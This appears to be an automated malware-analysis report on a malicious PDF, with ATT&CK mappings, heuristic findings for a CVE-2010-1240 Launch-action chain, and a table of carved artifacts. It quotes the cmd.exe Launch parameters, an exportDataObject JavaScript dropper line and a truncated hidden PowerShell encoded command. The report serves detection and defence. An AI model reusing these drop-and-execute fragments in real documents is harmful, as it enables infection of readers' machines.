MALICIOUS
616
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
T1059.007 JavaScript
The PDF file contains JavaScript that leverages a launch action to execute cmd.exe, which in turn attempts to run a payload. This payload is disguised as a PDF file named 'everybodysbookof00raci.pdf' but is detected as a Windows executable by ClamAV. The exploit CVE-2010-1240 is specifically mentioned, indicating a known vulnerability for client execution.
Machine Learning
- Nyx PDF Classifier malicious score 0.9981
Heuristics 15
-
Adobe Reader Launch action command execution critical CVE exact CVE_2010_1240PDF uses the Adobe Reader/Acrobat Launch action pattern associated with CVE-2010-1240: cmd.exe is invoked with attacker-controlled parameters, paired with an embedded/exported payload.
-
JPXDecode + active content — JPEG2000 CVE-family indicator high PDF_JPX_CVE_2018_4990_RELATEDPDF uses /JPXDecode (JPEG2000) alongside JavaScript, XFA, or RichMedia indicators. This matches the delivery pattern for Adobe Reader JPEG2000 parser exploit families, including CVE-2018-4990, but does not prove the exact malformed JP2/JPX primitive.
-
Malformed JPEG2000/JP2 box structure high PDF_JP2_BOX_ANOMALYPDF embeds JPEG2000/JP2 data with malformed box sizes. This is a parser-exploit indicator for JPX/JPEG2000 CVE families, not a unique CVE fingerprint.
-
ClamAV: Pdf.Tool.Agent-1388586 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Tool.Agent-1388586
-
Launch action critical PDF_LAUNCHPDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
-
/Launch action target: cmd.exe critical PDF_LAUNCH_COMMANDPDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\everybodysbookof00raci.pdf" (cd "Desktop"' — references a known-dangerous executable (cmd, PowerShell, etc.).
-
Embedded attachment masquerades: declared document, content is windows-executable critical PDF_EMBEDDED_FILESPEC_CONTENT_MISMATCHAn /EmbeddedFile attachment's declared filename extension or /Subtype MIME type contradicts the magic bytes of its decompressed content. The attachment is declared as a benign document or image but the bytes are an executable or executable-bearing archive. This is a deliberate deception used to hide droppers in PDF attachments and is a generic indicator of embed-and-drop weaponisation, independent of any specific CVE.
-
/Launch action paired with attachment-dropping JS API high PDF_LAUNCH_PLUS_DROPPER_JSPDF combines a /Launch action with a JavaScript API call that writes or opens an attached/external resource — the canonical shape of the CVE-2010-1240 /Launch + exportDataObject family. Benign PDFs do not pair these surfaces; the combination indicates a drop-and-execute chain regardless of the specific JS API knobs or /Launch target.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JBIG2Decode filter medium PDF_JBIG2JBIG2 image decoder present — historically used in zero-click exploits
-
Unusually high stream count medium PDF_MANY_STREAMSPDF contains 501+ stream objects — may indicate heap spray or heavy obfuscation
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.archive.org/details/everybodysbookof00raci)/CreationDate(D:20110219041504Z)/Producer(Recoded In PDF document text
Extracted artifacts 32
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
everybodysbookof00raci.pdf |
pdf-embedded-file | PDF EmbeddedFile object 1016 at offset 0x9E4E80 | 131776 bytes |
SHA-256: 4fc3e89f244e7d4d47f61245e214816a460996d6d1a5d2884a582df7d5fcdcdb |
|||
|
Detection
ClamAV:
Win.Dropper.Paph-9633927-0
Obfuscation or payload:
likely
actual_type=PE; declared_or_context_type=PDF; filename=everybodysbookof00raci.pdf; kind=pdf-embedded-file Static shellcode analysis recovered command string(s): powershell -window hidden -EncodedCommand JAB5AHIAcABKACAAPQAgACcAJABKAHoANAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIA Carved artifact contains a PowerShell -EncodedCommand style payload.
|
|||
javascript_obj1017_000.js |
pdf-javascript-stream | PDF /JS object 1017 at offset 0x9EED95 | 71 bytes |
SHA-256: fd8cf8ec4e6061476049590df497700f8669a537d25a451ec3d48fa6f48bb0ac |
|||
Preview scriptFirst 1,000 lines of the extracted script
this.exportDataObject({ cName: "everybodysbookof00raci", nLaunch: 0 });
|
|||
jbig2_00_off0000dec4.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xDEC4 | 8342 bytes |
SHA-256: ab48b79b22ec737f8b40001f9f59fbd256272e543535c11bfefdbdd9c8f2d179 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.97, consistent with packed or encrypted content.
|
|||
jbig2_01_off00014079.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x14079 | 528 bytes |
SHA-256: e88830669850485da0cc044920e65c0a4dfe57254bf4a6e7892f967f4abbd759 |
|||
jbig2_02_off0001c53a.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x1C53A | 14202 bytes |
SHA-256: 33230efab9f87b8565ea2bff6058e9927979c8c03dd833a1f6ce1bff42d07b98 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
jbig2_03_off00027274.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x27274 | 13840 bytes |
SHA-256: 332d02994c2dbb202e520f16eac17790217b70a6eff01c1e94abcd1ba5d9940f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
jbig2_04_off0003351d.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x3351D | 20205 bytes |
SHA-256: 2778dddfd5f17044984441f91556fa3063b06f5d014a98e60ea8122b518feaec |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_05_off00041907.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x41907 | 18952 bytes |
SHA-256: bce7eb3731f0f0a52abde8443281e9f8543ee70798cdfd38b5ca54b00566ac18 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_06_off0004e1d2.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x4E1D2 | 13945 bytes |
SHA-256: 43f9f704952c26e83bc113a931a704796014139efb624fc5965dd3a5d62bcc85 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
jbig2_07_off00059e9a.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x59E9A | 17913 bytes |
SHA-256: 6d4d1a2922db74a5071ac500e6686f6d353b3ba6bc9e1af9f79ff54562b73dad |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_08_off0006702f.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x6702F | 23659 bytes |
SHA-256: e7dbb818ecf77b2c23037a18cd17a92a22026868301ee689d3073b6e7c7fb1dc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_09_off00075cf8.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x75CF8 | 25946 bytes |
SHA-256: 672f365b09f20edf2fa245742b2559b527fe6cbfc33f9350151d05baa24a103d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_10_off00084707.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x84707 | 22282 bytes |
SHA-256: 03069626fc31d3df5e6c5e1624c63a6e9503183e9d2154a91007edafc60b9cf0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_11_off00092d9a.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x92D9A | 22122 bytes |
SHA-256: b1d233a32180ff97f92b69eb0316c76fef1493cc4ee8277857c702ca0cb52a0f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_12_off000a1529.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xA1529 | 22083 bytes |
SHA-256: f7627bc34ccb3a056a8c47ab5f96b19cb447005c7705f7488ab7b02e207d3a15 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_13_off000afb13.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xAFB13 | 21341 bytes |
SHA-256: 9692e5256b1bb35b9ef015aee8480ed31bd74ab2e773914da2acbd2362147894 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_14_off000bd43a.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xBD43A | 22411 bytes |
SHA-256: 8938602b8c3da91c76378e060d487d1fd43400e90976d8fdaafaca45779e4c3a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_15_off000cba33.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xCBA33 | 11222 bytes |
SHA-256: ad5f5dca4adcb9378a8b8bdd2cb42caaac18b3670908bc5a2806083da7753612 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.97, consistent with packed or encrypted content.
|
|||
jbig2_16_off000d715d.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xD715D | 20074 bytes |
SHA-256: 8d747a2406e191503c39b254148b1d0a84c5ae7746d9c35226ae8b09084b3a6d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_17_off000e4b7c.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xE4B7C | 21740 bytes |
SHA-256: 7daf60781fab1e50b82282ff8f79596346a0a6c7e90b4eb976e6371cfad9009a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_18_off000f3853.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0xF3853 | 23659 bytes |
SHA-256: daa0abdde2c7bb62b80e0020cfc17be8fc90b9da8f5bd22be597a1ee8f4b1988 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_19_off00101fd7.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x101FD7 | 19294 bytes |
SHA-256: 4ef3ec967ef4914862ccfc9fb7c91b1cc177c6f80d09944429af2eabee9c6f59 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_20_off0010fb8c.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x10FB8C | 20826 bytes |
SHA-256: 1ae4f1d7ffd74e62b6304bf6c5fc315b80d6d6bb1279fddc8676e013520e2636 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_21_off0011d959.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x11D959 | 17431 bytes |
SHA-256: 54281c1f7c02de83f8f3a7112f8cc785da9ba228fa1c1114fbad0e3337215343 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_22_off0012a443.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x12A443 | 15205 bytes |
SHA-256: fec7ee4466bc715f2ee27547439971fb28a8432a864c91fa48d6e2b3b5caa9fb |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
jbig2_23_off00136b39.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x136B39 | 22429 bytes |
SHA-256: 7edf00ad3d5bd43504cfabc7eb8b5cd4c9e2a48189960a442b9e9788521343b8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_24_off00146730.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x146730 | 11157 bytes |
SHA-256: 06c87cbdd9b3237f7775d0340342f54c3b363e10a7ec95063fd0ef9d308c32ae |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.97, consistent with packed or encrypted content.
|
|||
jbig2_25_off00152567.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x152567 | 20893 bytes |
SHA-256: 9f572b6df12f8be7b1b704627a093f9441fd8d3b957a15dfd52a2a39ed9dba6f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_26_off00160225.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x160225 | 17919 bytes |
SHA-256: 6809f4cc7efc26d91e2289ad7660ee4459f77b9fd2f4112b575cf1bd93147cc7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
jbig2_27_off0016cc7c.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x16CC7C | 20145 bytes |
SHA-256: 6583837255b5592b3b2abbc3094fdbbbfbc1b044632ec11c3bbd11c18ce6e8c6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_28_off0017ac58.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x17AC58 | 18366 bytes |
SHA-256: 48c349f852b1c80e59533c2671b025e1ee241215c65291300a01588fff510e00 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
jbig2_29_off00187fa2.bin |
pdf-jbig2-stream | PDF JBIG2 stream at offset 0x187FA2 | 21712 bytes |
SHA-256: 8ad4ceba32361d914af960e30cf23e86413eedee21051be9afeb48dfb91e23e9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.